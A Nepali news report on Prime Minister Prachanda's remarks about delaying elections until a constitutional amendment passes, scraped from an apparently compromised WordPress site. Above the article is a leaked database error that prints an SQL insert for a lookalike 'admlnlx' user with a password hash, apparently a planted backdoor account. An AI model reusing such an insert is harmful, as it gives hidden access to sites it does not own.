WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B.1e/VWvwg9NkPeeESMkNkcZV.CY1F.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-01 23:14:00', '', 'admlnlx', 'admlnlx')
काठमाडौं, माघ २३-
प्रधानमन्त्री पुष्पकमल दाहाल प्रचण्डले आफूले अहिले निर्वाचन गर्नको लागि आयोगलाई निर्देशन नदिएको जिकिर गरेका छन्।
शुक्रबार मधेशी मोर्चासँगको छलफलमा प्रधानमन्त्री दाहालले यस्तो खुलासा गरेका हुन्। बैठकमा सहभागी एक नेताका अनुसार प्रधानमन्त्री दाहालले आफू अहिलेपनि संविधान संशोधन प्रस्ताव पारित गरेपछिमात्रै चुनावमा जाने पक्षमा रहेको जिकिर गरेका थिए।
उनले प्रमुख प्रतिपक्षी दल नेकपा एमालेका अध्यक्ष केपी शर्मा ओलीलाई अलमलाउनको लागि मात्रै चुनावको तयारीमा जुट्न निर्वाचन आयोगलाई निर्देशन दिएको भन्दै मोर्चाका नेताहरुलाई आश्वासन दिएका थिए।
सत्तारुढ दल नेकपा माओवादी केन्द्रका नेता मातृका यादवले पनि प्रधानमन्त्री प्रचण्डले एमालेलाई अलमलाउनको लागि मात्रै निर्वाचनको तयारीमा जुट्न आयोगलाई आग्रह गरेको खुलासा गरे।
शनिबार विहान नेपाली रेडियो नेटवर्कको नियमित कार्यक्रम नेपाली बहसका लागि पत्रकार ऋषि धमलासँगको कुराकानीमा यादवले भने,‘निर्वाचनको मिति घोषणा गर्ने अहिले सरकारको कुनै तयारी छैन, पहिला संशोधन प्रस्ताव टुँगो लागेपछि मात्रै चुनावको मिति घोषणा हुन्छ।